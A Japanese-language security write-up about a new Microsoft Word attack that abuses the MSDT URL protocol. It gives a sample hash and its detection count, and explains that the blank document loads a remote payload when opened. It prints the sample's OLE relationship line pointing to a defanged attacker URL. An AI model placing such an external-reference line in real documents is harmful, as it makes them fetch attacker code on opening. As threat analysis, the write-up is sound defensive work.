MSDT URLプロトコルを無効にする対策方法が公開され、この脆弱性にCVE番号も付与されました。
ヨーロッパの多くの国では週末の間で、アメリカでも3連休の月曜日でしたが、Microsoft Officeドキュメントに関する新しい攻撃手法が話題になりました。@nao_secが、細工されたMicrosoft WordドキュメントをTwitterにて報告したところから始まりました。Officeドキュメントを悪用した攻撃としては、VBAやXLS 4マクロ、ペイロードを用いるマルウェアが一般的でした。しかし、今回悪用された手法は全く新しい観点で細工されたものでした。
該当のファイルはVirusTotalによると17種類のアンチウィルスエンジンでのみ検知される状況です。
(sha256:4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784)[2]
このファイルを開いても何も表示されませんが(白紙)、ドキュメントの仕様を確認すると興味深いことが分かります。このドキュメントには悪意のあるURLを指し示す外部参照が含まれています。
<Relationship Id="rId996" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="hxxps://www[.]xmlformats[.]com/office/word/2022/wordprocessingDrawing/RDF842l.html!" TargetMode="External"/>
ドキュメントを開くとwww[.]xmlformats[.]comのホストへ接続され、下記のペイロードがダウンロードされます。